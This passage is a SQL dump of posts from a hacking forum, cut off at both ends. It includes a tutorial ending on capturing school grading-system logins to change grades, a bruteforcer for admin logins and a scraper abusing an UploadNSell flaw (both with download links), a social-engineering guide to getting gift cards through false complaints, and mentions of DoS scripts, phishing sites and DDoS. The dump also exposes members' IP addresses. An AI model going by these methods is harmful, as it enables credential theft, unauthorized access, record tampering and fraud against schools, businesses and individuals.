clicking the plus button:\r\n[img]http://i.imgur.com/XaSE9.png[/img]\r\n\r\nAnd click \"OK\"\r\n\r\nA nice little warning is that anyone who is connecting to a website via SSL will see this (most will just click to continue):\r\n[img]http://i.imgur.com/A6iri.png[/img]\r\n\r\n[size=large][b][color=#FF0000]Congrads! You are now capturing only the school grading system logins (unless multiple websites share the same field name!)\r\n\r\nThen remember the logins, go home (hide behind a proxy!) and login on the website and change your grades!\r\n\r\nTHIS IF FOR EDUCATIONAL PURPOSES AND THIS TUTORIAL IS WRITTEN BY remasoni \r\n\r\n[/color][/b][/size]', '72.229.164.105', '1223009385', '1', '0', '5', '1346643469', '1', '96efe1f36ef038701e4b221f354cd4a5', '0', '1346643469'); INSERT INTO mybb_posts VALUES('1459', '311', '0', '15', 'UploadNSell Scraper', '0', '5', 'Timmy', '1346643720', '[size=medium][font=Courier][align=center][color=#FFA500]Hey, I just found one of the first pieces of code I\'ve ever written dug deep within my harddrive, and I assumed that some of you may like it.[/color]\n\n[color=#DCDCDC]Note: This was written in Visual Basic before I learned any other language, so the code is pretty... shitty.[/color]\n\n[color=#FF6347]It scrapes download links from http://uploadnsell.com, so you get free books, programs, and other stuff. I\'ve gotten some cool ebooks and some other shit like serial keys for games from it[/color]\n\n[color=#00BFFF][spoiler=Screenshots (Kinda simple)][img]http://jumla.in/i/tbs.png[/img][/spoiler][/color]\n\n[color=#FF69B4][spoiler=Virus Scan][img]http://jumla.in/i/zuv.png[/img]\n\n[url=https://www.virustotal.com/file/8ff1957871c5e51d025eaceb44a49db52f8baa41c7096ff3a300da0b090a500b/analysis/]Virus Scan[/url]\n[/spoiler][/color]\n\n[color=#00BFFF][spoiler=How to use]Due to the exploit I\'m using, you can only scrape the most recently purchased application. This means that you never know what your going to get. If you just leave this online overnight, you can acquire a nice list of download links.\n\nThe \"Manual Scrape\" button is mostly there for debugging, the program will automatically check every 30 seconds by itself.\n\nDownload links expire in 24 hours after they are scraped. Just FYI.[/spoiler][/color]\n\n[color=#32CD32][spoiler=Download]\n[lock][url=http://jumla.in/files/UploadNSellScraperNOSPAM.exe]Download (Active spam filter)[/url]\n[size=x-small][url=http://jumla.in/files/UploadNSellScraper.exe]Download (No spam filter)[/url][/size][/lock]\n\n[/spoiler]\n\nAgain, I made this awhile ago. There are probably bugs, feel free to PM me about them, but, I may not bother fixing them.[/color][/align][/font][/size]\n\nDeveloper: Jumla', '72.229.164.105', '1223009385', '1', '0', '1', '1352011453', '1', '0073e9214a8d25b557564d126b17de00', '0', '1352011453'); INSERT INTO mybb_posts VALUES('1460', '308', '1453', '3', 'RE: Marketplace Removed', '0', '5', 'Timmy', '1346643789', 'Sucks but you had a legit reason.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9a0e75a0b78086764e30841564234a69', '0', '0'); INSERT INTO mybb_posts VALUES('1461', '238', '1021', '56', 'RE: Ban the user above you', '0', '5', 'Timmy', '1346643920', 'Banned for having a blue username.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '22e92a2d5251f13bbc8239f3e9d3e856', '0', '0'); INSERT INTO mybb_posts VALUES('1462', '253', '1106', '56', 'RE: Count to 200', '0', '5', 'Timmy', '1346644063', '19. We\'re close to 20.\n\nBTW congratz apathy', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '89e952af2072a445fde1cf555ea8f044', '0', '0'); INSERT INTO mybb_posts VALUES('1463', '284', '1338', '7', 'RE: Typing Speed Test', '0', '5', 'Timmy', '1346644149', 'Mine\n\n[img]http://10fastfingers.com/speedtests/generate_screenshot_result/52_278_0_0_50_5_70.24_13191_44324[/img]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '9bef1fa76f1d282a2ef645b3cd0e9d01', '0', '0'); INSERT INTO mybb_posts VALUES('1464', '156', '449', '13', 'RE: [tut]View/Download SQL DB', '0', '8', 'spacefish36', '1346644265', 'Nice tutorial, Thanks for the dork.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'd2eba8e6426545b499c0da63f6aedce1', '0', '0'); INSERT INTO mybb_posts VALUES('1465', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '8', 'spacefish36', '1346644318', 'Haven\'t tried it but it\'s a popular tutorial and yet unsaturated. Thanks', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'a50e9c28190ae185a74dba84f8961f8f', '0', '0'); INSERT INTO mybb_posts VALUES('1466', '238', '1461', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346644326', '[quote=\'Timmy\' pid=\'1461\' dateline=\'1346643920\']\r\nBanned for having a blue username.\r\n[/quote]\r\n\r\nBanned for joining in June.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '1b492f4b2eb218211d4b2b85820bc5c1', '0', '0'); INSERT INTO mybb_posts VALUES('1467', '312', '0', '15', 'RKTs Admin Login Bruteforcer v1.0', '0', '8', 'spacefish36', '1346644365', '[align=center][color=#FFD700][size=medium]Some screenshots:[/size][/color]\n[spoiler]\nMessage on startup.\n[img]http://www.dodaj.rs/f/3T/vJ/1DSiyaHq/message.png[/img]\nProgram in action.\n[img]http://www.dodaj.rs/f/1p/v7/3Ibfxoil/program.png[/img]\n[/spoiler]\n\n\n[color=#FF0000]Tool is coded by me in VB.Net and it requires Net Framework 4.0 installed on PC.[/color]\n\n[size=medium][color=#FFD700]How it works:[/color][/size]\nIt works by combinating passwords from passwords list with admin username.Once when password is right,u will be in admin panel!\n\n[size=medium][color=#FFD700]How to:[/color][/size]\nWrite admin login page URL,load passwords list,and write admin username.\nNext thing to do is to find username,password and login button name.\nTo do that go on your admin login page and open source code,then find names.\n[spoiler][img]http://www.dodaj.rs/f/3Y/5U/1nVirbAb/names.png[/img][/spoiler]\n\n\n[lock][color=#FFD700][size=medium]Download (with 85 passwords list):[/size][/color]\n[spoiler]\n[code]http://www.sendspace.com/file/pvgonl[/code]\nor\n[code]http://mir.cr/7ZG8P4NL[/code]\n[/spoiler]\n[/lock]\n\n[size=medium][color=#FFD700]Note:[/color][/size]\nIf you do something wrong,error will show.Just ingore it,if it keeps showing press stop button.\nv2.0 will be automated and much better![/align]', '72.229.164.105', '1223009385', '0', '0', '1', '1352012143', '1', '404978d9aa44beca3c902961d1b715e7', '0', '1352012143'); INSERT INTO mybb_posts VALUES('1468', '238', '1461', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346644371', '[quote=\'Timmy\' pid=\'1461\' dateline=\'1346643920\']\r\nBanned for having a blue username.\r\n[/quote]\r\n\r\nBanned for posting above me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '95aac74d406fa455eb4ae189c8cd2fbf', '0', '0'); INSERT INTO mybb_posts VALUES('1469', '214', '1006', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '8', 'spacefish36', '1346644488', '[quote=\'iTzIpod\' pid=\'1006\' dateline=\'1345951240\']\r\nAgreed with Timmy. Lmfao.\r\n\r\n\r\nDid someone say \"Ipod\"?!?!??!? :D\r\n\r\nHave no fear, iTzIpod is here. =]\r\n\r\nOT: I don\'t get this? \r\n\r\nWait.. I don\'t know how to code.\r\n[/quote]\r\n\r\nIt\'s a PID generator, people use the code in the OP to make a program. With the program you make special codes such as serials & PIDs for iPod then you use it to SE an Ipod', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '54358b38afd4244913ad4cf0a626d2ff', '0', '0'); INSERT INTO mybb_posts VALUES('1470', '215', '857', '52', 'RE: Adf.ly BOT source code', '0', '8', 'spacefish36', '1346644540', 'Thanks, I recently made a bot with this. Seems to be working good.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'bfbfc7cb3a0843d8b3c1d51c4238103b', '0', '0'); INSERT INTO mybb_posts VALUES('1471', '259', '1147', '34', 'RE: Instant\'s GFX Guide', '0', '8', 'spacefish36', '1346644597', 'Nice tutorial but it seems like you messed up the code and you don\'t know how to fix this. Reported hopefully someone fixes the links.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'b00d7c57a1f1daee181e7c08ba4efc60', '0', '0'); INSERT INTO mybb_posts VALUES('1472', '313', '0', '52', '[VB.net Source] PayPal Cash System', '0', '1', 't3h jok3r', '1346644969', 'I\'ve been working on this PayPal Cash System, but i didn\'t have the time to finish it so I\'d thought that i would share it here so somebody else could finish it. Or just use the code to learn from.\n\nHere\'s a demonstration:\n\n[video=youtube]http://www.youtube.com/watch?v=jzwt00dXhVM&feature=youtu.be[/video]\n\nYou can download the project here:\n\nhttps://dl.dropbox.com/u/48593307/PayPal%20Cash%20System.rar\n\nThis was made by me, so please give credits if u decide to share it or something. Enjoy \n\nThanks to idb for the utility class\n\nCredits: Anders', '72.229.164.105', '1223009385', '1', '0', '1', '1346644992', '1', 'd6c55ab911593c00274869d94c2a24b1', '0', '1346644992'); INSERT INTO mybb_posts VALUES('1473', '259', '1147', '34', 'RE: Instant\'s GFX Guide', '0', '1', 't3h jok3r', '1346645083', 'I actually can\'t go through this thread and fix each link because I have more stuff to do.\n\nBTW the solution is change URL to url. It shouldn\'t be uppercase.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'dbb69c6ce9bab187268775e208dbcd15', '0', '0'); INSERT INTO mybb_posts VALUES('1474', '314', '0', '2', 'Testing Staff Message MyCode', '0', '1', 't3h jok3r', '1346645469', '[mod]Tried infecting members[/mod]', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '908bbeb5afd775abfb25d5629088874b', '0', '0'); INSERT INTO mybb_posts VALUES('1475', '259', '1147', '34', 'RE: Instant\'s GFX Guide', '0', '82', 'iTzIpod', '1346645677', 'Alright. I\'ll fix this tomorrow or so. If I got time.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b714b8ef79d13413dc55c58473a82a2a', '0', '0'); INSERT INTO mybb_posts VALUES('1476', '315', '0', '61', 'Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1346646375', 'Welcome everyone,\nThis is Unique\'s private HQ. \nThis is our introduction thread.', '24.212.197.164', '416597412', '1', '0', '82', '1346691754', '1', '572069b584c8ce154cbc9a11ad64e050', '0', '1346691754'); INSERT INTO mybb_posts VALUES('1489', '317', '0', '61', 'Unique\'s Purpose', '0', '82', 'iTzIpod', '1346692068', 'Leaders:\r\nLeader - iTzIpod\r\nLeader - NXK\r\n\r\n\r\n\r\nPurpose\r\nUnique is a group of knowledgeable & high-quality members. A group that is unique and \"special\" in many ways. We only invite members who meet the requirements and are Unique.\r\n\r\n\r\nThank you for reading, \r\nUnique\'s Leaders\r\n - iTzIpod\r\n - NXK', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8182ef902d887ab931fc0a7eff8d248c', '0', '0'); INSERT INTO mybb_posts VALUES('1477', '307', '1445', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '84', 'Thunder™', '1346646589', 'Not a big announcement :@', '111.91.75.221', '1868254173', '0', '0', '0', '0', '1', 'c1420ed32c720a9d714817058ad94855', '0', '0'); INSERT INTO mybb_posts VALUES('1490', '316', '1480', '4', 'RE: Hello everyone.', '0', '82', 'iTzIpod', '1346692291', 'Hello Remorsal.\nWelcome to LH. \nEnjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b730a28d3e4672ae6806351cf93d0a5b', '0', '0'); INSERT INTO mybb_posts VALUES('1491', '266', '1488', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1346692600', '[quote=\'Jacob\' pid=\'1488\' dateline=\'1346691314\']\r\nCan I participate ? :)\r\n\r\nThanks :)\r\n[/quote]\r\n\r\n[quote=\'iTzIpod\' pid=\'1186\' dateline=\'1346111714\']\r\n[b]Requirements: 25+ posts And 3 days registered.[/b]\r\n[/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '10b4f60e6fb0dec822ca9066e58f8c0e', '0', '0'); INSERT INTO mybb_posts VALUES('1479', '253', '1462', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346647957', '[quote=\'Timmy\' pid=\'1462\' dateline=\'1346644063\']\r\n19. We\'re close to 20.\r\n\r\nBTW congratz apathy\r\n[/quote]\r\n\r\n20. 180 more.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c67453e32cf20b9e80249b491b8b10d8', '0', '0'); INSERT INTO mybb_posts VALUES('1480', '316', '0', '4', 'Hello everyone.', '0', '166', '2112', '1346648382', 'Hello everyone, I\'m [i]Remorsal[/i]. (2112 now)\n\nI partake in HF, and quite a bit of other things, I hope I get to know you guys well.', '108.220.98.220', '1826382556', '0', '0', '166', '1346718316', '1', '3b31924082d9246b9ef23d964151df8e', '0', '1346718316'); INSERT INTO mybb_posts VALUES('1481', '311', '1459', '15', 'RE: UploadNSell Scraper', '0', '2', 'Apathy', '1346651424', 'Does this use the check purchase then add it to after download method?', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '6199beaeb0bb97495c0c0874f4851837', '0', '0'); INSERT INTO mybb_posts VALUES('1482', '313', '1472', '52', 'RE: [VB.net Source] PayPal Cash System', '0', '2', 'Apathy', '1346651597', 'So what is this for?', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'babcc3fd9b68028fd93f78038f49c232', '0', '0'); INSERT INTO mybb_posts VALUES('1483', '311', '1459', '15', 'RE: UploadNSell Scraper', '0', '67', 'HoverCatz', '1346656899', 'I already made one, and its not copy pasted from HF.', '193.161.89.201', '-1046390327', '1', '0', '0', '0', '1', '0c6b1ee5757954508e42e6951d5f71db', '0', '0'); INSERT INTO mybb_posts VALUES('1484', '302', '1405', '53', 'RE: Java DoS Script', '0', '67', 'HoverCatz', '1346658527', 'Why do you share code when you dont know what it does?\nThe code i quoted will execute if you attack \"website.org\", and it will make your cpu go to 100%.', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', 'bd18e057a695ce870e875b2a0a60e478', '0', '0'); INSERT INTO mybb_posts VALUES('1485', '307', '1445', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '160', 'Jacob', '1346673100', 'Welcome :)\n\nI was the one who PMed you :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '6139ffe8a19d7ee48154368e1a312e47', '0', '0'); INSERT INTO mybb_posts VALUES('1486', '307', '1448', '3', 'RE: [Announcement] T3h Jok3r is back!!!', '0', '61', 'NXK', '1346688837', 'Welcome back.\r\n\r\nHope your trip was good.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '0593f33e54e1d79e432e5c7784664e45', '0', '0'); INSERT INTO mybb_posts VALUES('1487', '212', '1450', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346691089', '[quote=\'t3h jok3r\' pid=\'1450\' dateline=\'1346642117\']\r\nSo far, only the Unique group was added. Other group ideas were overlooked. \r\n\r\nMr. Omni\'s group suggestion was declined because their userbar wasn\'t attractive and I found out that they won\'t be active on LH because of their own website.\r\n[/quote]\r\n\r\nOh alright. Thanks for making Unique Official! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9ebf45667226d540a5a1216c3de227ce', '0', '0'); INSERT INTO mybb_posts VALUES('1488', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '160', 'Jacob', '1346691314', 'Can I participate ? :)\n\nThanks :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', 'b05caf70a1382dcab3fa46b0ae0dd60a', '0', '0'); INSERT INTO mybb_posts VALUES('1492', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '53', 'sirchamp', '1346693876', 'WOW Nice thanks so much..', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '88e598d50a2c4f0fb021e978a940cab1', '0', '0'); INSERT INTO mybb_posts VALUES('1493', '318', '0', '9', 'Want to Earn Money by doing Nothing ?', '0', '84', 'Thunder™', '1346695796', 'Want to Earn money Quick by Doing nothing ?\r\nU can Earn money by just Playing Heads and Tails.\r\n[IMG]http://i.imgur.com/ijaCG.jpg[/IMG]\r\n[IMG]http://i.imgur.com/ChOzw.jpg[/IMG]\r\n\r\nU will Get Paid instantly.\r\n[url=http://www.gugold.com/index.php?ref=U0713481]Click Here to Visit.[/url] :)', '111.91.75.56', '1868254008', '0', '0', '0', '0', '1', '488dc25b977bba43c6e985876cb24ce7', '0', '0'); INSERT INTO mybb_posts VALUES('1494', '318', '1493', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '82', 'iTzIpod', '1346696391', 'I don\'t get it.. How do I register an account and start gambling me some money? O_o\n\nEDIT: Nevermind. So I made a Reserve Liberty account and now I want to start gambling some money.. But I don\'t have money on my account so I can\'r gamble. -_-\nWhat do I do?', '24.212.197.164', '416597412', '1', '0', '82', '1346698239', '1', '054f38f2eada2f39f1e664a9a58bb044', '0', '1346698239'); INSERT INTO mybb_posts VALUES('1495', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '61', 'NXK', '1346696967', 'When I came online and looked at the bottom where it shows online users, It displays your name as green.. same color as the free members. I got scared and thought you were demoted aha. \n\nThis is awesome!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'ba1a7df9e94a4032c578e5c15ae58a91', '0', '0'); INSERT INTO mybb_posts VALUES('1496', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '61', 'NXK', '1346697031', 'I hope everyone that joins us will put in as much dedication into these forums as we have!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '0014cefe89582225875fa2fb8a9b14d3', '0', '0'); INSERT INTO mybb_posts VALUES('1497', '319', '0', '3', '[Bug] Gray/Grey Stars are bugged', '0', '82', 'iTzIpod', '1346697522', 'Lol I don\'t know what to spell... Gray/Grey.. \r\n\r\nBut the Gray/Grey Stars under my name are bugged. They no longer exist in LH\'s database.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8db1b86312719c72578b82529a5e10f7', '0', '0'); INSERT INTO mybb_posts VALUES('1498', '315', '1495', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1346697620', '[quote=\'NXK\' pid=\'1495\' dateline=\'1346696967\']\r\nWhen I came online and looked at the bottom where it shows online users, It displays your name as green.. same color as the free members. I got scared and thought you were demoted aha. \r\n\r\nThis is awesome!\r\n[/quote]\r\n\r\nLOL :p\r\nI am/was equipping my Unique Userbar.\r\n\r\nIt\'s Unique :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cddce5ebbe9345fd60206f61eafbb0e6', '0', '0'); INSERT INTO mybb_posts VALUES('1499', '319', '1497', '3', 'RE: [Bug] Gray/Grey Stars are bugged', '0', '1', 't3h jok3r', '1346700417', 'LMAO.\n\nIt\'s not a bug and they [b]DO[/b] exist in the database.\n\nSolved>Closed', '72.229.164.105', '1223009385', '1', '0', '1', '1346700450', '1', '9af5f5c2d036dbc3dfdf6eb2cfed0156', '0', '1346700450'); INSERT INTO mybb_posts VALUES('1516', '325', '1515', '7', 'RE: Total users online', '0', '82', 'iTzIpod', '1346712859', 'I remember our last record was 27 or so. And then it was 29 or something and now, it is 31. Bravo :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c03acad57307afb2b590552750d7cc83', '0', '0'); INSERT INTO mybb_posts VALUES('1517', '323', '1505', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346716105', 'I agree with Apathy; almost everyone schools are starting not just that some people even have community service. \n\nI won\'t demote you but you can check back on LH at night, I\'m sure people are free in the night.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '36ab82d033b04746d7f006ec4b4b0456', '0', '0'); INSERT INTO mybb_posts VALUES('1501', '320', '0', '34', 'Fashion Dream Signature Tutorial', '0', '82', 'iTzIpod', '1346702440', '[img]http://fc02.deviantart.net/fs24/f/2007/332/0/c/fashion_dream_by_sanderrednas.png[/img]\r\n\r\nCredits: SandeRRednaS\r\n\r\nEnjoy! Post results below.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e70c92251b4461a0b5e4cf4219fea8a', '0', '0'); INSERT INTO mybb_posts VALUES('1502', '321', '0', '34', 'Full Signature Tutorial', '0', '82', 'iTzIpod', '1346702634', '[img]http://fc07.deviantart.net/fs18/f/2007/130/7/7/Full_Signature_Tutorial_by_Senthrax.jpg[/img]\r\n\r\nCredits: Senthrax\r\n\r\nEnjoy!\r\nGood luck making it. And also, post your results below.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e8eb009980cacc57e5343eb03d0b4c0', '0', '0'); INSERT INTO mybb_posts VALUES('1503', '322', '0', '34', 'Signature Tutorial', '0', '82', 'iTzIpod', '1346702729', '[img]http://fc02.deviantart.net/fs17/f/2007/208/7/f/Signature_Tutorial_by_Element1908.png[/img]\r\n\r\nCredits: Element1908\r\n\r\nEnjoy. \r\n\r\nThis one looks nice, I might post my own result.\r\n\r\nPost results below! \r\n\r\nGood luck!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b278faf17d480eeb5716a59966d9f471', '0', '0'); INSERT INTO mybb_posts VALUES('1504', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '82', 'iTzIpod', '1346702883', 'Wow.. Everytime I try this method, there is always that 1 Month XBL guy on HF.\n:p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e6d11af2c6edfad4e51f821a19bce3e', '0', '0'); INSERT INTO mybb_posts VALUES('1505', '323', '0', '7', 'If I go inactive', '0', '82', 'iTzIpod', '1346704261', 'Hey LH, \r\nIf I go inactive, that will be because I will be going back to school tomorrow (Tuesday, September 4 2012).\r\nI apologize for the inconvenience and if you need something, please feel free to add me on Skype or MSN. Or PM me. \r\n\r\n\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd65e551ee6a321c0518508847763ebe8', '0', '0'); INSERT INTO mybb_posts VALUES('1507', '316', '1480', '4', 'RE: Hello everyone.', '0', '2', 'Apathy', '1346708727', 'Welcome to the site. Enjoy your stay and hope to see you around.', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '76f4aa7ade3ab0e7984b2d9bf78c2242', '0', '0'); INSERT INTO mybb_posts VALUES('1508', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '2', 'Apathy', '1346708817', 'Interesting idea but is there any specific thing?', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'b3df3bb9324dbd3bbfc4db3274ac99e4', '0', '0'); INSERT INTO mybb_posts VALUES('1509', '320', '1501', '34', 'RE: Fashion Dream Signature Tutorial', '0', '2', 'Apathy', '1346708894', 'I was looking at this tut the other day o da. :3', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', 'eb4df1e2af5753a435637f66a1e38ee4', '0', '0'); INSERT INTO mybb_posts VALUES('1510', '317', '1508', '61', 'RE: Unique\'s Purpose', '0', '61', 'NXK', '1346708983', '[quote=\'Apathy\' pid=\'1508\' dateline=\'1346708817\']\nInteresting idea but is there any specific thing?\n[/quote]\n\nIs there any specific thing?\n\n^ what? This group is for unique members who are special in there own way. Strive in something that not all the other normal members don\'t.', '99.253.65.17', '1677541649', '0', '0', '61', '1346709967', '1', '373fa6aee6fc558bcea74f65d4a15a83', '0', '1346709967'); INSERT INTO mybb_posts VALUES('1511', '323', '1505', '7', 'RE: If I go inactive', '0', '2', 'Apathy', '1346708988', 'You should not be going inactive if you are a mod. :3 School is starting for everyone as well. :/', '173.206.177.61', '-1378963139', '0', '0', '0', '0', '1', '41011922a8bc22d58bc0bd24d13a3067', '0', '0'); INSERT INTO mybb_posts VALUES('1512', '298', '1383', '9', 'RE: ???[EASY] LH\'s #1 WAY TO EARN MONEY GUARANTEED [EASY]???', '0', '82', 'iTzIpod', '1346709081', 'Sigh.. This user doesn\'t go on anymore.. Guess I can\'t get this method..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b54f40264ebb4524fe0e297a0a5dfc0', '0', '0'); INSERT INTO mybb_posts VALUES('1513', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346709348', 'Well t3h jok3r will demote me if it happens.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a4a5fa562552350add2b16347ebda31', '0', '0'); INSERT INTO mybb_posts VALUES('1514', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '67', 'HoverCatz', '1346710844', 'In my own way? Does (Extreme)-DDoS Count xD', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '549cd8f6a7c5de1e3c9e3b89be13ac1a', '0', '0'); INSERT INTO mybb_posts VALUES('1515', '325', '0', '7', 'Total users online', '0', '67', 'HoverCatz', '1346710974', 'Hey! Did we just beat the old record?\r\n\r\n[img]http://gyazo.com/bef3b17bda246f47ac67940956404360.png[/img]', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '3fea5b2611cfea944eededdb619e700d', '0', '0'); INSERT INTO mybb_posts VALUES('1518', '325', '1515', '7', 'RE: Total users online', '0', '1', 't3h jok3r', '1346716145', 'Wait we did. Thanks to everyone on LH for visiting L33THacking.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3a4a9f24b319bc6e249e251ea068bc7a', '0', '0'); INSERT INTO mybb_posts VALUES('1519', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346716259', '@t3h jok3r, I\'m sure I will get a lot of homework. And I mean a lot.\n\nAlso, I gotta sleep early for school...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5c38a4ba237e1dea43302de8207e59e', '0', '0'); INSERT INTO mybb_posts VALUES('1520', '326', '0', '16', '[TUT] Free Restaurant Gift Cards.', '0', '166', '2112', '1346716335', '[color=#FF0000][size=x-large][align=center]Free Restaurant Gift Ca.rds[/align][/size][/color]\r\n\r\nOkay, so this is probably the easiest Social Engineer I know,and it works 95% of the time.\r\n\r\nFirst pick the destination of the place where you want to eat, choose a moderately low price restaurant such as Olive Garden, Chile\'s, Applebee\'s, or anything along those lines.\r\n\r\nYou\'re going to go to their website, and find the customer support part of the section. Email them saying that you didn\'t have great service when you had went last to the given destination. Try to acknowledge the fact that you are a constant customer who is loyal to the restaurant. Here\'s an example of what you should put. It\'s not the best it\'s just a little quick sloppy example.\r\n\r\nEX: \"I feel as if I should report this as I have been a loyal customer for years going several times a week. I had a dinner party for my son who had just turned 13, and the service was just horrible. The waiters were no help what-so-ever, and they were taking forever to take out the food. When the food had arrived everything was cold, and under cooked. I had spent well about $150 on food that was not satisfying at all\" \r\n\r\nYou will have to enter in your phone number, and they usually reply within days. They\'ll send you an email saying that they apologize, and will refund you with a gift ca.rd for their next purchase. I\'ve done this before and was able to get a $50 Olive Garden gift ca.rd for my parents.\r\n\r\nThere\'s a chance that you will get a phone call , but you can go ahead, and tell them \"That you\'re busy\" at the moment, and that [i]YOU\'LL [/i]call them back later. \r\n\r\n[b]Estimated arrival time:[/b] 5-7 days\r\n[b]How easy on a scale from 1-10:[/b] 2\r\n\r\n[u]I\'ve tried this myself and I can say that it DOES work. [/u]', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'c8186ba496ec1d736d9fe36550522ba9', '0', '0'); INSERT INTO mybb_posts VALUES('1521', '313', '1472', '52', 'RE: [VB.net Source] PayPal Cash System', '0', '1', 't3h jok3r', '1346716668', 'Isn\'t like to order stuff.\n\nEX: If you bought a booter program and you require more credits then you can purchase more credits through the program instead of going onto your browser, visiting PayPal.com, paying for it then waiting for the seller to provide you with more credits.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'ffd913894ce55975903a46543f108871', '0', '0'); INSERT INTO mybb_posts VALUES('1522', '326', '1520', '16', 'RE: [TUT] Free Restaurant Gift Cards.', '0', '82', 'iTzIpod', '1346717167', 'Seems legit.\n\nNice tutorial =]\n\nGood luck to everyone that is going to try this', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bdfcd93f6395a08b5418bd25d4a4ee22', '0', '0'); INSERT INTO mybb_posts VALUES('1523', '323', '1505', '7', 'RE: If I go inactive', '0', '166', '2112', '1346717437', 'It\'s sad to see when school has to take up time to go on a forum, but in all honesty school helps you go a long way. So make sure to put school ahead of things.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', 'e082438dd444f8101f214950a0aa7eb8', '0', '0'); INSERT INTO mybb_posts VALUES('1524', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '82', 'iTzIpod', '1346717467', 'I don\'t think this user is active anymore.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5c68822e0f7f9cad55f473383832afc2', '0', '0'); INSERT INTO mybb_posts VALUES('1525', '323', '1519', '7', 'RE: If I go inactive', '0', '1', 't3h jok3r', '1346717648', '[quote=\'iTzIpod\' pid=\'1519\' dateline=\'1346716259\']\r\n@t3h jok3r, I\'m sure I will get a lot of homework. And I mean a lot.\r\n\r\nAlso, I gotta sleep early for school...\r\n[/quote]\r\n\r\nIf you are in US then I\'m sure you can\'t get much homework and when it comes to sleeping time then you\'re right we have to sleep early but around 9-10 is not bad.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'd28ada7f084f9be4cd9bdef2bb7cb394', '0', '0'); INSERT INTO mybb_posts VALUES('1526', '316', '1480', '4', 'RE: Hello everyone.', '0', '166', '2112', '1346717839', 'Thank you, I\'m sure I will like it here.', '108.220.98.220', '1826382556', '0', '0', '0', '0', '1', '971317f87549d132571b515b67cd3018', '0', '0'); INSERT INTO mybb_posts VALUES('1527', '323', '1505', '7', 'RE: If I go inactive', '0', '82', 'iTzIpod', '1346717916', 'I don\'t live in US @t3h jok3r.\n\nAnd @2112, you\'re right. (:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3810ca89764ccb6b17e665cde09ad0a3', '0', '0'); INSERT INTO mybb_posts 